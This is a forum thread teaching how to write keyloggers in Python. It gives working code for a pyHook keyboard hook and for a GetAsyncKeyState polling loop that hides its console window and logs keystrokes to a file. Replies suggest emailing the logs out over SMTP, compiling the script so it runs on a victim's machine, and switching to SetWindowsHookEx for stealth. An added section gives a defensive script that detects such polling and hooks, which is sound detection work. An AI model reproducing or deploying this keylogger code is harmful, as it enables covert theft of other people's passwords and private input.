Programming Keyloggers

Post by maboroshi »

How to Write a Software Keylogger

According to the wiki, key loggers perform the following:
Keystroke logging (often called keylogging) is a method of capturing and recording user keystrokes.
Although nowadays you would also want to capture mouse events, I won't be getting into mouse hooks in this tutorial. Someone else can do that if they like. The language I will use will be Python, obviously not the best choice, but you can convert it into your desired language: C, Java or whatever.

My first example: a module designed for this purpose:

A lot of languages will have key logging modules already available for use. Python has one called PyHook. Here is an example of PyHook:

Code:

import pythoncom, pyHook 

def OnKeyboardEvent(event):
	print event.Key
	return True
 
# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

We import our modules, then create a function and pass it an event parameter. What this does is tell Python an event should occur (in this case, our keyboard input).

We then call our pyHook functions to listen for our keyboard input.

Wow, a keylogger in about 8 – 20 lines of code.

Next, we can move on to the Win API.

Code:

import win32api 
import win32console 
import win32gui 
win = win32console.GetConsoleWindow() 
win32gui.ShowWindow(win, 0) 
try: 
    mylog_file = open("/HOME/output.txt","a") 
except IOError: 
    print "Error grabbing file" 
else: 
    while 1:  
        for i in range(32, 256): 
            keyit = win32api.GetAsyncKeyState(i) 
            if keyit == -32767: 
                keyEnd = 81 
                mylog_file.write(chr(i)) 
                if i == keyEnd: 
                    mylog_file.close() 
                    keyin = open("/HOME/output.txt","r") 
                    data = keyin.read() 

OK, this is a bit more drastic code with some extras. If you don't know what winapi is, I suggest you read up on it. It will give you a lot of insight into coding.

Import necessary modules:

Code:

import win32api 
import win32console 
import win32gui 

We then hide the console window:

Code:

win = win32console.GetConsoleWindow() 
win32gui.ShowWindow(win, 0) 

Try and open a file for logging. Python tends to automagically create one if it's not there.

Code:

try: 
    mylog_file = open("/HOME/output.txt","a") 
except IOError: 
    print "Error grabbing file" 

Get our range of keys and call the winapi GetAsyncKeyState function. What this does, according to Microsoft:
The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

Code:

for i in range(32, 256):
    keyit = win32api.GetAsyncKeyState(i)

If Shift Q is pressed, log data to file:

Code:

keyEnd = 81
mylog_file.write(chr(i))
if i == keyEnd:
    mylog_file.close()
    keyin = open("/HOME/output.txt","r")
    data = keyin.read()

Alright, that wasn't so bad, was it? :-P


This is just code to be a starting point. I do not say these ways are the best or only ways; it's more or less meant as a very basic introduction to coding keyloggers.

Next article (Sending keystrokes over the network)

By Maboroshi

Resources

Wiki http://en.wikipedia.org/wiki/Keystroke_logging
PyHook http://pyhook.wiki.sourceforge.net/
GetAsyncKeyState http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx
Last edited by maboroshi on 26 Apr 2009, 14:47, edited 2 times in total.

Post by ebrizzlez »

Nice tut mabo. :wink:

With Python you can also import the sockets library and do a telnet connect to an SMTP server and send the log to an email. There are so many possibilities and more.

The only setback in Python is that, to run this keylogger, the Python interpreter has to run the script, which means it's useless if the victim doesn't have Python installed. So your alternative is to grab a Python compiler and try to compile the code into an executable that can run in system memory. :)

Post by IceDane »

I just saw this thread now, but I assume that since this is a tutorial, I am allowed to 'revive the thread'.

I would just like to comment on your choice of method for keylogging; GetAsyncKeyState is the worst of all. Using it, you are basically polling the keyboard's state as many times as possible every second. I haven't made one myself that uses it (because it was pointless), but I can imagine that it might eat your CPU resources.

Best case scenario, it doesn't eat your CPU, but it's as sneaky as a fat kid walking through the park, beating his belly while yodeling.

Use windows hooks. SetWindowsHookEx and so on. But I'm pretty sure that's what python is doing in the first example, anyway.
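
The point above that polling is conspicuous can be turned into a detection rule. This is an added example, not code from any poster in this thread: it scans a constructed API-call trace (the trace format, process names, PIDs, window and threshold are all assumptions) and flags a process that sweeps GetAsyncKeyState across most of the key-code range or installs a keyboard hook through SetWindowsHookEx.

```python
from collections import defaultdict

WH_KEYBOARD, WH_KEYBOARD_LL = 2, 13   # idHook values for keyboard hooks
SWEEP_THRESHOLD = 100                 # assumed: distinct key codes per window
WINDOW_SECONDS = 1.0                  # assumed window length

def build_sample_trace():
    """Constructed trace lines in the form 'time pid process api arg'."""
    lines = []
    # Polling loop as in the tutorial: every code 32..255, swept repeatedly.
    for sweep in range(3):
        for vk in range(32, 256):
            ts = sweep * 0.3 + vk / 1000
            lines.append(f"{ts:.3f} 4120 pythonw.exe GetAsyncKeyState {vk}")
    # A game polling four movement keys (W, A, S, D) is not a sweep.
    for tick in range(50):
        for vk in (0x57, 0x41, 0x53, 0x44):
            lines.append(f"{tick * 0.02:.3f} 3388 game.exe GetAsyncKeyState {vk}")
    # A global low-level keyboard hook being installed.
    lines.append("0.500 5012 helper.exe SetWindowsHookEx 13")
    return lines

def detect(lines):
    """Return {pid: (process, reason)} for keyboard-capture behaviour."""
    seen = defaultdict(lambda: defaultdict(set))   # pid -> window -> key codes
    findings = {}
    for line in lines:
        ts, pid, proc, api, arg = line.split()
        pid, arg = int(pid), int(arg)
        if api == "SetWindowsHookEx" and arg in (WH_KEYBOARD, WH_KEYBOARD_LL):
            findings[pid] = (proc, "keyboard hook installed")
        elif api == "GetAsyncKeyState":
            window = int(float(ts) // WINDOW_SECONDS)
            keys = seen[pid][window]
            keys.add(arg)
            # Many distinct key codes in one window means a full-range sweep.
            if len(keys) >= SWEEP_THRESHOLD:
                findings[pid] = (proc, "GetAsyncKeyState sweep")
    return findings

if __name__ == "__main__":
    for pid, (proc, reason) in sorted(detect(build_sample_trace()).items()):
        print(pid, proc, reason)
```

Hotkey utilities and accessibility tools also install keyboard hooks, so a hook finding is a lead to triage rather than a verdict.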

Post by maboroshi »

Oh, I agree, IceDane.

But GetAsyncKeyState is a good start. :-) But if you like, feel free to add a tutorial on writing keyloggers with a better method. Perhaps in a language better suited for it, like C++ :-)
